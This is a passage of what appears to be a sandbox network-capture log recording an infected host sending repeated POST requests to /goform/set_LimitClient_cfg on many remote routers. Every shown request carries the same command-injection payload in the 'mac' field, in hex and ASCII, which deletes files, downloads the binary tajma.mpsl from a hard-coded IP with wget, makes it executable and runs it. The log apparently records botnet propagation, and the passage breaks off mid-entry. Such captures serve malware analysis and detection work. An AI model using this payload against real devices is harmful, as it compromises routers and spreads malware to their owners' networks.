                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1223192.168.2.2347954118.22.242.2028080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373657942 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1224192.168.2.2337208202.219.137.678080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373687983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1225192.168.2.2345838131.193.168.1278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373699903 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1226192.168.2.2356694211.231.188.738080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373714924 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1227192.168.2.235947880.187.72.388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373737097 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1228192.168.2.234276825.122.57.38080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373754978 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1229192.168.2.2348276107.208.110.418080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373770952 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1230192.168.2.2360472166.190.55.08080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373775005 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1231192.168.2.2345852184.44.160.1838080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373796940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1232192.168.2.235007842.207.141.1538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373811007 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1233192.168.2.2338978151.111.76.1358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373833895 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1234192.168.2.23581961.136.152.468080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373848915 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1235192.168.2.2352440171.118.221.1688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373858929 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1236192.168.2.233790014.88.125.2348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373895884 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1237192.168.2.2357996205.206.205.598080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373910904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1238192.168.2.234675613.207.139.668080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373934031 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1239192.168.2.233715893.185.194.2168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373953104 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1240192.168.2.2359120119.158.214.2358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373966932 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1241192.168.2.2343396166.131.27.538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.373990059 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1242192.168.2.2340862150.167.68.1278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.374011040 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1243192.168.2.2349246172.93.12.1438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.374037027 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1244192.168.2.234352635.128.242.478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.374051094 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1245192.168.2.2334182205.63.159.258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:09.374075890 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
